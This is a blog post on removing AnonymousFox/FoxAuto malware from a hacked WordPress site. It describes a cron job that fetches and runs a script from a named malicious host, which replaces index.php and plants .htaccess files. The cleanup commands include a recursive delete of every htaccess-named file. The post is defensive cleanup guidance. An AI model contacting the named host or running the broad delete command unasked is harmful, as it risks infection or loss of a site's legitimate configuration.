.htaccess » 🔴 FoxAuto WordPress malware

🔴 FoxAuto WordPress malware

The AnonymousFox Hack guide by Sucuri misses a huge step in cleaning a hacked WordPress website, and that step is: removing the cronjobs

While removing AnonymousFox malware from a website I noticed the following cron:

image 4 1024x156 - 🔴 FoxAuto WordPress malware

It downloads a script from http://hello.hahaha666.xyz/xxxd and runs it, the script is:

image 5 - 🔴 FoxAuto WordPress malware

It creates a new folder css and replaces the index.php file with http://hello.hahaha666.xyz/wp-class.txt

image 2 1024x395 - 🔴 FoxAuto WordPress malware

source code:

This file then modifies the default .htaccess and creates a .htaccess file inside every directory. These .htaccess files can be found by using the command:

grep -r "Deny from all" *
image 3 - 🔴 FoxAuto WordPress malware

to remove all these .htaccess files:

find -type f -name '*htaccess*' -delete

As mentioned at the beginning of the post, checking and removing cronjobs is necessary when cleaning up hacked WordPress websites, and I hope that sucuri will eventually include it in their “fix FoxAuto WordPress malware” guide.

See also  Cache REST API responses and speed up WordPress REST API requests

Was this post helpful?

2 thoughts on “🔴 FoxAuto WordPress malware”

  1. Hello,
    the command is used from the terminal (SSH), if you are using cPanel, look for “Terminal” icon:
    cPanel Terminal icon

    then enter the folder where your website is located, example: cd public_html where cd means enter and public_html is the directory name.

    and use grep -r "Deny from all" * to find all .htaccess files that are blocking access:

    cPanel terminal

    If you are not using cpanel or don’t see the “Terminal” icon, ask your hosting provider for SSH access.


Leave a Comment

I enjoy constructive responses and professional comments to my posts, and invite anyone to comment or link to my site.